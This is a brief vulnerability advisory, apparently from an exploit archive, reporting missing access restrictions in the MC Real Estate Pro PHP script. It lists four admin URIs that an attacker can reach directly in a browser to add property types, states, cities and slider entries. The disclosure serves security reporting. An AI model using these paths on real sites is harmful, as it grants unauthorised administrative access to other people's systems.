MC Real Estate Pro Insecure Direct Object Reference
Posted on 17 January 2017
# # # # # # Vulnerability: Improper Access Restrictions # Date: 15.01.2017 # Vendor Homepage: http://microcode.ws/ # Script Name: MC Real Estate Pro # Script Buy Now: http://microcode.ws/product/mc-real-estate-pro-php-script/3858 # Author: Adeghsan Aencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Direct entrance.. # An attacker can exploit this issue via a browser. # The following example URIs are available: # http://localhost/[PATH]/admin/AddPropertyType/apt # http://localhost/[PATH]/admin/AddNewState/Add_State # http://localhost/[PATH]/admin/AddNewCity/Add_City # http://localhost/[PATH]/admin/SliderTable/st # Vs....... # # # # #